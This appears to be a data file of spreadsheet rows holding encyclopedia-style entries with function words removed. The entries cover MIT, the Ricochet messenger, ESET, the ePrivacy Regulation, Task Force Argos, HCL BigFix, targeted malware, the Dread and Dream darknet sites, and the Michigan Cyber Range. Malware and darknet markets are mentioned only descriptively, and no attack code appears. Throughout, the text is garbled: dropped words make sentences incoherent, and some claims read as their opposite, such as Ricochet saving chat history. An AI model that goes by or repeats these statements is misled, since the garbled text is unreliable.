taxpayer-funded research technology international especially japanese firms competing struggling american businesses. hand, mit's extensive collaboration federal government research projects several leaders serving presidential scientific advisers since 1940. established washington office 1991 continue effective lobbying research funding national science policy.the justice department began investigation 1989, 1991 filed antitrust suit mit, eight league colleges, eleven institutions allegedly engaging price-fixing annual "overlap meetings", held prevent bidding wars promising prospective students consuming funds need-based scholarships. while league institutions settled, contested charges, arguing practice anti-competitive ensured availability greatest number students. ultimately prevailed justice department dropped case 1994. mit's proximity harvard university ("the school river") substantial number research collaborations harvard-mit division health sciences technology broad institute. addition, students schools cross-register credits toward school's degrees without additional fees. cross-registration program wellesley college also existed since 1969, 2002 cambridge–mit institute launched undergraduate exchange program university cambridge. also long-term partnership imperial college london, student exchanges research collaboration. more modest cross-registration programs established boston university, brandeis university, tufts university, massachusetts college school museum fine arts, boston.mit maintains substantial research faculty ties independent research organizations boston area, charles stark draper laboratory, whitehead institute biomedical research, woods hole oceanographic institution. ongoing international research educational collaborations include amsterdam institute advanced metropolitan solutions (ams institute), singapore-mit alliance, mit-politecnico milano, mit-zaragoza international logistics program, projects countries international science technology initiatives (misti) program.the mass-market magazine technology review published subsidiary company, special edition also serves alumni magazine. press major university press, publishing books journals annually, emphasizing science technology well arts, architecture, media, current events, social issues. libraries, collections museums library system consists five subject libraries: barker (engineering), dewey (economics), hayden (humanities science), lewis (music), rotch (arts architecture). there also various specialized libraries archives. libraries contain million printed volumes, million microforms, 49,000 print electronic journal subscriptions, reference databases. past decade seen trend increased focus digital print resources libraries. notable collections include lewis music library emphasis 20th 21st-century music electronic music, list visual arts center's rotating exhibitions contemporary art, compton gallery's cross-disciplinary exhibitions. allocates percentage budget construction renovation commission support extensive public outdoor sculpture collection.the museum founded 1971 collects, preserves, exhibits artifacts significant culture history mit. museum engages significant educational outreach programs general public, including annual cambridge science festival, first celebration kind united states. since 2005, official mission been, engage wider community mit's science, technology areas scholarship ways best serve nation world 21st century". research elected association american universities 1934 classified among "r1: doctoral universities very high research activity"; research expenditures totaled $952 million 2017. federal government largest source sponsored research, department health human services granting $255.9 million, department defense $97.5 million, department energy $65.8 million, national science foundation $61.4 million, na</t>
  </si>
  <si>
    <t>Megan Price</t>
  </si>
  <si>
    <t>megan price executive director human rights data analysis group. collects analyses data investigate violations human rights. early life education price studied statistics case western reserve university. earned biostatistics rollins school public health 2009. completed certificate human rights emory university. soon graduated began working human rights data analysis group. career price worked strategies statistical analysis human rights data colombia, syria guatemala. whilst guatemala, price analysed documents national police archives. syria commissioned office united nations high commissioner human rights lead statistician reports. research fellow carnegie mellon university centre human rights science.she made director research human rights data analysis group 2013. appointed executive director 2015. 2016 awarded open society foundations executive fund. price editorial board significance magazine. participant 2018 science camp. elected chair american statistical association's social statistics program 2021. 2022, named fellow american statistical association. references</t>
  </si>
  <si>
    <t>Ricochet (software)</t>
  </si>
  <si>
    <t>ricochet ricochet free software, multi-platform, instant messaging software project originally developed john brooks later adopted official instant messaging client project invisible.im group. goal invisible.im group help people maintain privacy developing "metadata free" instant messaging client. history originally called torsion ricochet renamed june 2014. ricochet modern alternative torchat, updated several years, messenger, discontinued. september 2014, announced invisible.im group would working brooks development ricochet wired article zetter. zetter also wrote ricochet's future plans included protocol redesign file-transfer capabilities. protocol redesign implemented april 2015.in february 2016, ricochet's developers made public security audit sponsored open technology fund carried group november 2015. results audit "reasonably positive". audit identified "multiple areas improvement" vulnerability could used deanonymize users. according brooks, vulnerability fixed latest release. technology ricochet decentralized instant messenger, meaning server connect share metadata with. further, using tor, ricochet starts hidden service locally person's computer communicate ricochet users also running ricochet-created hidden services. this way, ricochet communication never leaves network. user screen name (example: ricochet:hslmfsg47dmcqctb) auto-generated upon first starting ricochet; first half screen name word "ricochet", second half address hidden service. before ricochet users talk, least must privately publicly share unique screen name way. privacy benefits ricochet reveal user addresses physical locations uses tor. message content cryptographically authenticated private. there need register anywhere order ricochet, particularly fixed server. contact list information stored locally, would difficult passive surveillance techniques determine user chatting with. ricochet save chat history. when user closes conversation, chat recoverable. hidden services prevents network traffic ever leaving network, thereby preserving anonymity complicating passive network surveillance. ricochet portable application, users need install software ricochet. ricochet connects network automatically. security warnings already-compromised computer system typically defeat privacy protections ricochet offers, keystroke logging malware. even though ricochet uses tor, applications using unless user independently additional services computer. active passive surveillance techniques still tell user using internet, when, necessarily internet. since ricochet user register anywhere ricochet, even password, important implement layered physical security, including disk encryption, protect ricochet. encryption present inactive data. tails linux users, live operating systems users, optionally backup ricochet zero-knowledge cloud services spideroak, personally owned drive (ideally encrypted). also comparison instant messaging clients ring (software) (protocol) references external links ricochet github https://www.ricochetrefresh.net</t>
  </si>
  <si>
    <t>ESET</t>
  </si>
  <si>
    <t>this article software company. egyptian goddess, eset.eset, s.r.o., software company specializing cybersecurity. eset´s security products made europe provide security software countries territories worldwide, software localized languages. company aims protect human progress globally provision security software services. company founded 1992 bratislava. however, history dates back 1987, company’s founders, miroslav trnka peter paško, developed first antivirus program called nod. this sparked idea friends help protect users soon grew antivirus software company. present, eset regularly recognized slovakia’s successful company annual basis europe’s biggest privately held cybersecurity company. company’s technology, billion users worldwide chrome cleanup, marketed banner “progress. protected.” history 1987-1992 beginnings eset date back december 1987, miroslav trnka peter paško wrote first antivirus program detect first computer viruses world, discovered named “vienna.” nature czechoslovak political regime considering computers common time, trnka paško unable market program. however, many virus discoveries followed, sparked idea devise universal software solution counter computer threats. miroslav trnka peter paško programmed first (nemocnica okraji disku, “hospital edge disk”), written programming language pascal. fact product launched communism private entrepreneurship banned, wasn’t 1992 miroslav trnka peter paško, together rudolf hrubý, established eset privately owned limited liability company former czechoslovakia. parallel nod, company also started developing perspekt, piece financial software whose development primarily rudolf hrubý. development perspekt halted light success eset’s security products. 1993-2002 company forced temporarily abandon czech market 1993 2001, following division czechoslovakia independent states: czech republic slovak republic. years following 1993 marked expansion company security products. 1995, streamlined version eset´s nod-ice antivirus program released. close decade, 1999, eset established regional headquarters diego (usa), expanding business overseas. 2003-2017 company’s headquarters remained bratislava, capital slovak republic. company four regional headquarters, allowing global distribution: bratislava (emea), diego (noram), buenos aires (latam), singapore (apac). eset technology alliance established 2013. this project allowed company extend portfolio security solutions include third-party products. goal partnership improve overall cyber-protection companies. current members eset technology alliance safetica (data loss prevention), greycortex mendel (network traffic analysis), xopero (data backup recovery). previously, deslock+ (data encryption) member alliance. their security tools integrated eset’s products. 2013, eset launched welivesecurity, blog site dedicated vast spectrum security-related topics. april 2015, eset surpassed 1,000 employees worldwide. december 2017 marked 30th anniversary company’s first security product. mark accomplishments, company released short documentary describing company’s evolution perspective founders miroslav trnka peter paško. year, company partnered google integrate technology chrome cleanup, security tool google chrome detects removes unwanted software encountered browsing web. 2018-present december 2018, eset partnered more ransom, global initiative provides victims ransomware decryption keys, thus removing pressure attackers. initiative supported interpol joined various national police forces. eset developed number technologies address threat ransomware produced number insightful papers documenting evolution. eset became founding member google’s defense alliance 2019, along lookout zimperium. goal alliance actively search malware android apps published google play store. eset’s products available countries worldwide distribution networks. company aims global impact cybersecurity, also betterment society. branches eset operates branches countries. local distributors used countries. first international branch opened 1999 diego, second czech republic 2001. other notable branches include buenos aires office (opened 2004), singapore (2013), tokyo (2018), company used enter south american asian markets. international branches company headquarters, regional office emea bratislava, slovakia (opened 1992)regional offices diego, usa, serving north america (1999) buenos aires, argentina, serving central south america (2004) singapore, serving asia, pacific region, australia (2013)local offices research development centers prague, czech republic (2001) jablonec nisou, czech republic (2008) krakow, poland (2008) paulo, brazil (2009) košice, slovakia (2010) montreal, canada (2012) jena, germany (2013) sydney, australia (2014) toronto, canada (2015) bournemouth, (2016) munich, germany (2016) taunton, (2016) brno, czech republic (2017) žilina, slovakia (2017) iași, romania (2017) melbourne, australia (2017) tokyo, japan (2018) mexico city, mexico (2018) milan, italy (2019) products eset provides security products home business users. products cover main operating systems across server, cloud, mobile deployments. eset’s first product nod, antivirus program computers running ms-dos operating system. nod32 microsoft windows released 1998 version 2003. third version, eset nod32 antivirus, followed 2007 along eset smart security added antispam firewall modules. eset nod32 antivirus additional related products wider suite security functions, including eset smart security premium eset internet security, upgraded released annual basis. 2010, eset released products macos, business version called eset endpoint antivirus home version called eset cyber security. eset also offers products android devices. first version eset mobile security announced 2012. product offers malware protection also provides call filter, adware detector, payment protection, theft protection (such card locking total data wipes). 2015, eset introduced eset parental control, allows parents monitor childrens’ android devices. eset smart security, designed protect android malware, phishing ransomware, introduced 2018 mobile world congress event barcelona. company offers full range solutions protect corporate data, ranging workstation server protection eset protect entry endpoint detection response eset enterprise inspector.eset also offers security products help companies comply gdpr requirements. these include eset secure authentication, two-factor authentication solution introduced 2015, eset endpoint encryption, eset released 2017 following integration deslock+ products since 2015. eset endpoint encryption offers file, folder, email, virtual disk encryption, well desktop shredder secure file deletion.along individual products packages, eset offers services designed mainly corporations large companies. these include managed detection response, premium support, security audits, incident response technology eset centers worldwide outstanding innovator field malicious code detection. 1995, eset introduced heuristic analysis detection engine. heuristic scanners suspicious files in-product sandbox observe behavior assess risk, meaning even previously unknown malicious code detected. eset using machine learning products, starting neural networks, since 1997. 2005, eset incorporated machine learning-based technology called detections, extracts precisely selected features called genes samples. these genes split samples clean, malicious potentially unwanted categories. 2019, eset released advanced machine learning detection layer analyze samples locally endpoints even off-line. 2011, eset replaced threatsense.net eset livegrid®, cloud-based reputation system evaluates unknown suspicious samples submitted anonymously millions eset-protected endpoints around world machine learning analysis servers bratislava. sample identified malicious, given score information shared eset-protected endpoints eset livegrid® reputation system, thus keeping users protected threats found parts world. eset’s host-based intrusion prevention system (hips) monitors system activity uses predefined rules recognize suspicious behavior. hips self-defense mechanism stops offending process carrying harmful activity detailed analysis necessary performs inspection internal modules. eset developed several modules hips, including advanced memory scanner, exploit blocker, ransomware shield, deep behavioral inspection. 2012, eset introduced exploit blocker, monitors commonly abused applications suspicious activity might indicate exploit. monitored applications include browsers, document readers, email clients, adobe flash, java, components microsoft office. exploit blocker helps protect users unknown threats zero-day attacks. advanced memory scanner introduced hips 2013. this module addresses obfuscation encryption malware authors code “in-memory only” thus avoid detection analysis. advanced memory scanner monitors behavior code decloaks memory. introduced 2017, ransomware shield monitors evaluates executed applications using behavioral reputation-based heuristics (relying eset livegrid®). behavior resembles ransomware identified, encryption files, ransomware shield either blocks application notifies user, choose block activity. 2019, eset released deep behavioral inspection, enables hips thoroughly inspect calls made suspicious unknown processes. process clearly malicious, deep behavioral inspection mitigates activity informs user. process suspicious, hips data gathered deep behavioral inspection analysis components request additional examination technologies part broader eset scanning engine. eset also uses additional security layers including botnet protection,network attack protection, script-based attacks protection, brute-force attack protection.in 2017, eset became first security company world implement uefi scanner. uefi firmware loaded computer’s memory startup process. scanner identify threats computer booting standard detection modules start running. malware research eset dedicates large part operations malware research, well monitoring advanced persistent threat groups cybercriminal groups, company’s employees working research.one notorious groups eset tracks sandworm. after 2015 attack ukrainian power grid global notpetya ransomware attack 2017 attributed sandworm eset discovered sandworm (more specifically, subgroup eset tracks telebots) deploying backdoor called exaramel, improved version main industroyer backdoor. industroyer used 2016 blackout ukraine, eset linked industroyer notpetya, well blackenergy, used 2015 blackout.at time notpetya outbreak, eset cisco tracked point global ransomware attack started companies afflicted telebots backdoor, resulting compromise m.e.doc, popular financial software ukraine.in march 2021, microsoft released out-of-band patches proxylogon vulnerability affecting on-premises versions microsoft exchange server, eset discovered groups leveraging vulnerability compromise them. proxylogon allows attacker take reachable exchange server, even without knowledge valid account credentials. addition, eset found multiple threat actors access details vulnerabilities even release patches. except dltminer, linked known cryptomining campaign, threat actors groups interested espionage: tick, luckymouse, calypso, websiic, winnti group, tonto team, shadowpad activity, “opera” cobalt strike, backdoors, mikroceen, dltminer, famoussparrow.another focus eset’s research threats android devices. eset discovered first clipper malware google play store called android/clipper.c, manipulate clipboard content. case cryptocurrency transaction, wallet address copied clipboard could quietly switched belonging attacker. area research, eset discovered krøøk vulnerability (cve-2019-15126) broadcom cypress wi-fi chips, allows wpa2-encrypted traffic encrypted zero session following wi-fi disassociation. then eset discovered another krøøk related vulnerability (cve-2020-3702) chips qualcomm mediatek, well microsoft azure sphere development kit, main difference traffic encrypted all.other notable research ludes discovery lojax, first uefi rootkit found wild, used campaign sednit (aka fancy bear) group. lojax written system’s flash memory able survive reinstall hard disk replacement. lojax drop execute malware disk boot process. 2021, eset discovered another uefi malware called especter, second real-world bootkit finspy known persist system partition form patched windows boot manager. 2021, eset released white paper anatomy native malware, analyzed unique samples malicious native extensions internet information services (iis) server software used wild categorized malware families previously undocumented. among families, malware demonstrated five main modes operation: backdoors, remotely control compromised computers; infostealers, steal information login credentials payment information; injectors, modify http responses sent legitimate visitors serve malicious content; proxies, compromised server unwitting parts command control infrastructure another malware family; fraud malware, modifies content served search engines. eset also works alongside experts competitors police organizations world investigate attacks. 2018, eset partnered european cybercrime centre specialist europol team investigates cybercrime member advisory group internet security. eset partnered enforcement agencies worldwide microsoft target dorkbot botnet 2015 gamarue (aka andromeda) botnet 2017. then 2020, eset partnered microsoft, lumen’s black lotus labs, ltd. attempt disrupt trickbot, another notorious botnet.eset continues referenced (450+ references august 2021) prolific contributors (180+ contributions august 2021) mitre att&amp;ck, globally accessible knowledge base adversary tactics techniques. awards eset’s products regularly tested independent organizations av-comparatives av-test. company discontinued testing virus bulletin 2020.in december 2016, eset became first company receive vb100 awards single product. strategy eset four core brand values: courage, integrity, reliability, passion. furthermore, company committed ethical business practices. company’s commercial model based maintaining good relationships customers. eset rarely provides products free (so-called freemium) never monetized user data. corporate social responsibility eset strives keep people safe, educate them, make everyday lives better online offline. eset builds social responsibility four core values: courage, integrity, reliability, passion. 2011, nadácia eset eset foundation established. funded eset owners eset. eset foundation focuses primarily activities field education support science research. since 2019, eset foundation hosted eset science award, recognizes achievements slovakia-based scientists. eset science award granted three categories: outstanding individual contributor slovak science, exceptional young scientist slovakia outstanding academic.the eset foundation partnered organization learn2code, teaches general public code helps find better jobs. foundation also collaborates slovak university technology (stu) bratislava, eset’s tech-focused employees teach interacademic subjects. eset invests science, technology, engineering, mathematics programs educational activities, especially support women children tech, well community outreach programs. eset ambassador diversity charter, voluntary initiative supported european commission platform diversity charters.eset launched bezpečne nete portal, draws attention digital threats explains safeguard privacy promote better security. part bezpečne nete eset’s global initiative safer kids online, shows parents teachers, together children, raise awareness minimize online risks. safer kids online also cooperates internet matters. eset works family online safety institute (fosi) innovate solutions policies cybersecurity. eset works collaboration european migration agency technical university moldova’s cyber security academy, launched 2020 support talented young women being pillars eset’s program, eset also offers annual es-et women cybersecurity scholarship.another cooperation formed diego police foundation enhance safetynet program.in 2020, peak covid-19 crisis, eset donated 300,000 toward development tests detect sars-cov-2 virus. slovak scientists registered test slovakia’s state institute drug control 2020. partnerships sponsorships eset sponsor borussia dortmund football club since 2019. eset’s sponsorship club last next three seasons bundesliga, germany’s highest football league. since 2019, company also sponsoring infamous gaming, latin american esports team. other former current partnerships include tennis canada, pixel federation, chronicle alphabet company). logo visual identity name “eset” derived name ancient egyptian goddess, also known isis aset. according egyptian mythology, goddess healing magic. also known protector healer. logo, shape pill, represents computer systems cured. development logo time: (from left) 1992, 2001, current (since 2002). eset android first appeared 2007, launch eset smart security consumer product. goal deployment android highlight products’ intelligence. trivia nod, first product distributed eset, acronym nemocnice okraji disku (“hospital edge disk”), reference czechoslovak series nemocnice okraji města (“hospital edge city”).eset products sold security products european union. five largest companies field worldwide, largest cybersecurity vendor build products european union. also antivirus software comparison antivirus software comparison computer viruses references external links official website https://www.welivesecurity.com eset managed security website</t>
  </si>
  <si>
    <t>EPrivacy Regulation</t>
  </si>
  <si>
    <t>eprivacy regulation (epr) proposal regulation various privacy-related topics, mostly relation electronic communications within european union. full name "regulation european parliament council concerning respect private life protection personal data electronic communications repealing directive 2002/58/ec (regulation privacy electronic communications)." would repeal privacy electronic communications directive 2002 (eprivacy directive) would specialis general data protection regulation. would particularise complement latter respect privacy-related topics. fields proposed regulation confidentiality communications, privacy controls electronic consent browsers, cookies. history regulation goes back january 2017 european commission proposed eprivacy regulation. intention would alongside gdpr (general data protection regulation) introduced 2018. scope still discussion. according proposals, would apply business processes data relation form online communication service, uses online tracking technologies, engages electronic direct marketing.the proposed penalties noncompliance would million case undertaking, total worldwide annual turnover, whichever higher. eprivacy regulation originally intended come effect 2018, together gdpr, still adopted. difference regulation directive (new) eprivacy regulation repeal (current) eprivacy directive. contrary directive, regulation legal european union becomes immediately effective member states simultaneously. current eprivacy directive legal european union requires member states achieve particular result without dictating means achieving result. therefore implemented national laws regulations. proposed eprivacy regulation became effective, laws would superseded (for reasons clarity) likely repealed. eprivacy regulation would self-executing require many implementing measures. points commission's proposal according commission, proposal includes following changes: players: privacy rules also apply players providing electronic communications services whatsapp, facebook messenger, skype. that ensure popular services guarantee level confidentiality communications traditional telecoms operators. stronger rules: people businesses enjoy level protection electronic communications directly applicable regulation. businesses also benefit single rules across communications content metadata: privacy guaranteed communications like time location call. metadata high privacy component must anonymised deleted users give consent unless data needed billing. business opportunities: once consent given communications data (content and/or metadata) processed, traditional telecoms operators opportunities provide additional services develop businesses. example, could produce heat maps indicating presence individuals, could help public authorities transport companies developing infrastructure projects. simpler rules cookies: cookie provision, resulted overload consent requests internet users, streamlined. rule user-friendly, browser settings provide easy accept refuse tracking cookies identifiers. proposal also clarifies consent needed non-privacy-intrusive cookies improving internet experience (like remember shopping cart history) cookies used website count number visitors. protection spam: proposal bans unsolicited electronic communications emails, sms, automated calling machines. depending national law, people either protected default able do-not-call list avoid receiving marketing phone calls. marketing callers need display phone number special pre-fix indicates marketing call. more effective enforcement: enforcement confidentiality rules regulation responsibility data protection authorities, already charge rules general data protection regulation. reception february 2021 german federal commissioner data protection freedom information multiple lines crossed. data retention become part proposal, despite fact ruled unlawful many courts. regulations concerning internet constituted step back cookie walls would allowed. important consumer rights "right object" "data protection impact assessment" would voided. personal data could processed purposes different original ones without person's consent. "pay-or-allow-to-be-tracked" question access website would henceforth permitted. directive 2001 required 15(1) data might retained important public interest. proposal reference public interest more.in march 2021, france reported leading effort modify eprivacy initiative exempt national security agencies provisions.on july 6th, 2021, european parliament approved derogation eprivacy regulation enables providers electronic communication services scan report private online messages containing material depicting child abuse, allow companies apply approved technologies detect grooming techniques. references external links proposed regulation privacy electronic communications europa.eu procedure file: 2017/0003(cod) legislative observatory european parliament</t>
  </si>
  <si>
    <t>Task Force Argos</t>
  </si>
  <si>
    <t>task force argos branch queensland police service, responsible investigation online child exploitation abuse. founded 1997, unit's original charter investigate institutional child abuse allegations arising forde inquiry. unit's name derived greek mythology, argus panoptes, argos, primordial "all seeing" giant multiple eyes, guardian goddess protector goddess, argos great strong: sleep never fell upon eyes, kept sure watch always. technological advances wider access internet unit 2002 explore avenues address growing community concern proliferation child exploitation across internet. task force argos identified potential threats children online chat rooms, sexual predators grooming children recruiting engage sexual activity. notable cases march 2002, argos began undercover operation person discovered chat room seeking underage girls sex. argos operative, posing 14-year-old girl, asked meet offender brisbane could photograph nude her. during online conversations offender claimed 66,000 images child exploitation. argos identified offender, search computer identified contact offences involving multiple children. child years time, befriended offender internet. child aged five, made available offender father offender internet chat room.in 2004, child pornography website, located belarus, taken international task force, involving australian federal police australian high tech crime centre codename operation auxin. operation arrest australians, including queensland. officers task force argos identified seven children located brisbane child exploitation material rescued harm.in 2006, similar international operation undertaken, codenamed achilles. task force argos formed alliance federal bureau investigation lengthy covert operation smashed sophisticated international network online offenders responsible distributing creating on-demand graphic, child exploitation material. operation achilles began january 2006 closed february 2008, execution warrants arrest offenders australia, united states, germany united kingdom. task force argos officers infiltrated international child offender network trading images videos depicting violent sexual abuse children. completion operation achilles associated sub-operations around world resulted removal children sexually abusive situations, arrest network members globally closure four commercial child exploitation websites. work task force argos raising community awareness dangers online predatory behaviour recognised globally. team awarded international enforcement cybercrime award 2011 (gold award) society policing cyberspace (polcyb), canadian-based organisation committed enhancing partnerships order prevent combat crimes cyberspace.task force argos also responsible partnering software powerhouse microsoft develop australian national victim image library aimed reducing investigator exposure child exploitation material improve opportunity identify children risk. microsoft donated technical development expertise build capability identification database currently national deployment.task force argos works closely international counterparts deliver positive outcomes child victims, irrespective children might geographically located. unit relies victim identification expertise specialist also chair interpol specialist group crimes against children. employing robust victim identification strategies effectively identify locate child victims offenders found prosecuted. operation involved police taking running dark network several months, resulting rescuing children hundreds arrests, including notorious british paedophile richard huckle site's operator shannon mccoole. task force argos expends considerable effort protect children on-line researching contemporary technology effectively target on-line predators. adopting mantra 'leave stone unturned' insignia scorpion (the natural predator 'rock spider') focus squarely child protection ensure exhaustive inquiries conducted child victim sexual exploitation ever overlooked. during 2016-2017, argos operated darknet child pornography site childs play eleven months. notable abandoned prosecutions december 2008, task force members arrested charged maroochydore 'using internet access publish child-abuse material' allegedly reposted liveleak viral video another swinging baby arms. although offender successfully committed district court trial, september 2009 announced charges dropped commonwealth director public prosecutions reviewing case. poster called inquiry came charged first place. references external links interview task force argos squad member queensland police service</t>
  </si>
  <si>
    <t>Draft:HCL BigFix</t>
  </si>
  <si>
    <t>bigfix (formerly known bigfix, endpoint manager, tivoli endpoint manager (tem), well company name bigfix inc) endpoint management platform enabling operations security teams automate discovery, management, remediation on-premise, virtual, cloud endpoints. bigfix automates management, patching, inventory nearly operating system versions. bigfix’s unified architecture patches, manages, ensures compliance across servers, desktops, mobile devices office, home, cloud. bigfix integrated several third-party applications including vulnerability management solutions like tenable qualys, servicenow, forescout, others. endpoint management capabilities extend aws, azure, google clouds. bigfix creates managed several hundred thousand out-of-the-box automation scripts, called fixlets perform security checks, enhance security posture, many functions. product formerly owned sold sold technologies july 2019. july 2019, technologies completed acquisition bigfix ibm, previously acquired bigfix undisclosed amount. changed name bigfix product tivoli endpoint manager (tem), shortened name endpoint manager (iem) 2013. changed name back bigfix july 2015. history bigfix, inc., founded david hindawi david donoho april, 1997 emeryville, california. company’s initial product user self-service system management application marketed manufacturers. 2002, company developed bigfix software company-wide networked desktop, mobile server computer management. this shifted focus company consumer enterprise markets. initial uses centered security patch management, identified significant pain point time enterprise departments. 2007, bigfix expanded specific management areas: security threat suppression (bigfix endpoint protection), enterprise security configuration management (bigfix security configuration vulnerability management) enterprise systems management (bigfix systems lifecycle management).in 2009, bigfix entered exclusive partnership trend micro.markets included: banking, financial services, manufacturing, government, education, healthcare. customers included: pitney bowes, stanford university, suntrust bank, miami-dade county public schools, department energy.on july 2010, acquired bigfix, inc. approximately $400 million, integrated bigfix product tivoli software portfolio name tivoli endpoint manager(tem). march 2013, tivoli endpoint manager renamed became endpoint manager (iem).on july 2015, changed name endpoint manager back bigfix.on december 2018, technologies announced acquisition bigfix acquisition closed july 2019. early marketing deloitte’s silicon valley technology fast 2007 2008 2008 award behalf miami-dade county public schools infoworld 2008 behalf miami-dade county public schools computerworld green best practices 2008 award behalf miami-dade county public schools; category logo design love 2008 reporting logo similarities stadt bruhl, beats relevance language relevance language query language created bigfix. purpose relevance language automate operations functions like discovery, properties client (such cpu, disk space, etc.) could retrieved. relevance language abstracts away platform-specific query mechanisms like wmi, /proc, sim. this allows operator learn query language works across supported platforms. addition cross platform compatibility, relevance efficient query language, often responding hundreds times faster native alternatives, wmi.[6] action script action script language scripting language created bigfix. prior purchased ibm, used bigfix platform. action script language provides interface changes made client. action script language abstracts away platform-specific scripting differences like directory traversal, script execution flow control extent. this allows operator learn scripting language works across supported platforms. also relevance language systems management system administration configuration management information security management software license agreement power management list systems management systems references</t>
  </si>
  <si>
    <t>Targeted threat</t>
  </si>
  <si>
    <t>targeted threats class malware destined specific organization industry. type crimeware, threats particular concern designed capture sensitive information. targeted attacks include threats delivered smtp e-mail, port attacks, zero attack vulnerability exploits phishing messages. government organisations targeted sector. financial industries second targeted sector, likely cybercriminals desire profit confidential, sensitive information financial industry infrastructure houses. similarly, online brokerage accounts also targeted attacks. impact impact targeted attacks far-reaching. addition regulatory sanctions imposed hipaa, sarbanes-oxley, gramm-leach-bliley laws, lead loss revenue, focus corporate momentum. they expose sensitive customer data, damage corporate reputations incur potential lawsuits. detection prevention contrast widespread spam attack, widely noticed, targeted attacks sent limited number organizations, crimeware threats tend reported thus elude malware scanners. heuristics multiple-layered pattern scanning traffic-origin scanning. targets known locations traffic anomalies. behavior observation. including desktop emulator solutions virtual machine behavior analysis. examples instance, trojan horses used targeted threat israeli companies could conduct corporate espionage other. hotword trojan, ginwui ppdropper trojans additional examples trojans used corporate espionage. targeted destination attacks harvested addresses send messages directly recipients without record lookup. aims specific sites users defeating hosted protection services internal gateways deliver e-mail malicious payloads. external links analysis targeted attacks notes</t>
  </si>
  <si>
    <t>Dread (forum)</t>
  </si>
  <si>
    <t>dread reddit-like dark discussion forum featuring news discussions around darknet markets. site's administrators alias paris hugbunter. history dread popular community described "reddit-style forum" successor seized deepdotweb discussion around market enforcement activity scams. came prominence 2018 reddit banned several darknet market discussion communities, rapidly reaching 12,000 registered users within three months launched, 14,683 users june 2018. activities 2019 moderator wall street market posted hidden address dread, potentially leading exit scam seizure shortly after. stolen data sometimes sold dread. site features depth guides around manufacture illegal drugs. shut dream market announced dread march 2019. major denial-of-service attacks launched dread markets exploiting vulnerability protocol. external links dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion (accessing link help) references</t>
  </si>
  <si>
    <t>Dream Market</t>
  </si>
  <si>
    <t>dream market online darknet market founded late 2013. dream market operated hidden service network, allowing online users browse anonymously securely avoiding potential monitoring traffic. marketplace sold variety content, including drugs, stolen data, counterfeit consumer goods, using cryptocurrency. dream provided escrow service, disputes handled staff. market also accompanying forums, hosted different url, buyers, vendors, members community could interact. administrator prolific vendor vallerius arrested august 2017. site shut april 2019. history following seizures shutdowns alphabay hansa markets july 2017 part operation bayonet, much speculation dream market would become predominant darknet marketplace. formerly, dream market considered second-largest darknet marketplace, alphabay largest hansa third-largest. many vendors buyers alphabay hansa communities registered dream market aftermath operation bayonet. rumors time suggested dream market enforcement control.at time, dream market reported "57,000 listings drugs 4,000 listings opioids".dream market administrator prolific vendor vallerius arrested august 2017, border search laptop confirmed identity online drug dealer oxymonster. equivalent us$500,000 cryptocurrency bitcoin also discovered device. vallerius subject ongoing investigation regarding large online narcotics purchases began february 2016.on march 2019 banner added dream market site announcing shutdown april 2019 addition transferring services partner company" followed .onion link. some users believe owner's reaction ongoing distributed denial-of-service attacks others doubt credibility message suspect connection enforcement, scammers competing marketplaces. security issues shortly recent seizures markets, accounts number dream market vendors came control dutch enforcement. since official statement released dutch authorities regarding matter, unclear accounts compromised, though researchers suggest shared credentials blame. september 2017, dream users reported loss funds accounts posts forums reddit. post market's news page, staff later confirmed hard drive loss caused issue promised refund lost funds. references also</t>
  </si>
  <si>
    <t>Michigan Cyber Range</t>
  </si>
  <si>
    <t>michigan cyber range established merit network summer 2012 teach cybersecurity certification courses, provide cybersecurity-related services, develop virtual cybersecurity training environment, known alphaville. merit network staffs operates michigan cyber range arbor, michigan. range's infrastructure contains virtual servers placed merit's fiber-optic network, largest fiber-optic network michigan. harnessing merit’s fiber-optic network allows michigan cyber range scale virtual environment (alphaville) unprecedented size. michigan cyber range currently five physical locations michigan, campuses northern michigan university marquette, michigan, wayne state university warren, pinckney high school pinckney, wmcat grand rapids, university michigan flint. range, exercises vast capture flag nearly challenges, paintball teams control alphaville, cyber sentinel incident response plans skills tested. these exercises coupled cyber security educational classes, workshops, private secure sandboxes round michigan cyber range’s service offerings. michigan cyber range partners include merit network, u.s. department homeland security, u.s. department energy, national institute standards technology, energy, consumers energy, plante moran pllc, juniper networks, eastern michigan university, michigan state police, michigan's department military veterans affairs, michigan economic development corporation, michigan department technology, management budget. history michigan cyber range foundational piece michigan governor rick snyder's cyber initiative, launched october 2011 improve cybersecurity efforts protect families, communities, businesses government. merit network's president welch who, professor, helped create united states military academy's cybersecurity program, worked david behen state brigadier general mike stone michigan national guard create vision michigan cyber range secure start-up funding. throughout 2012, public private organizations pledged funds michigan cyber range created staffed. william "joe" adams joined merit network june 2012 executive director research michigan cyber range. adams, career signal corps officer u.s. army, formerly national defense university. adams also served professor research scientist west point network engineer supreme headquarters allied powers europe. shortly hiring, adams assembled staff create maintain michigan cyber range's cybersecurity training environment, called alphaville. alphaville virtual environment simulates computer systems small town. alphaville's components include: city hall, public library, small business, public school, datacenter, power company. each components represents different security scenario. organizations companies practice detection mitigation cybersecurity threats using alphaville environment. november 2012, michigan governor snyder participated ribbon-cutting ceremony michigan cyber range. january 2013, michigan cyber range began collaboration arrangement mile2, developer provider vendor neutral professional certifications cybersecurity industry. mile2 provides course materials, instructors certification exams michigan cyber range, range offers full curriculum training courses many cybersecurity disciplines. mile2 recognized u.s. national security agency (nsa) information assurance (ia) courseware institution, company cnss-accredited well nist niccs-mapped. organizations businesses michigan cyber range conduct cybersecurity exercises simulate various kinds cyberattacks. july 2013, members west michigan cyber security consortium (wmcsc) participated team–blue team exercise, wmcsc team members defended resources virtual town cyber attacks initiated michigan cyber range staff. michigan cyber range, members west michigan cyber security consortium (wmcsc) members michigan cyber civilian corps (mic3) joined forces second blue team exercise campus davenport university july 2014. september 2013, merit network introduced cybersecurity service, called merit secure sandbox, uses infrastructure michigan cyber range. organizations service cybersecurity exercises, educational purposes, software testing. march 2014, michigan cyber range opened first cybersecurity kind u.s. national guard base, dedicating facility located 110th attack wing battle creek, michigan. michigan governor rick snyder attended ribbon-cutting ceremony. during event, teams battle creek participated cybersecurity exercises similar teams united states military academy west point california national guard. october 2014, consumers energy energy conducted incident response exercise using michigan cyber range. representatives power companies michigan state police worked closely michigan cyber range staff create exercise, called "power phoenix", required participants diagnose mitigate malware-compromised computer network scada environment. early 2015, wayne county community college district (wcccd), conjunction michigan cyber range mile2, hosted groundbreaking veteran's retraining program. 13-week program prepared group military veterans career 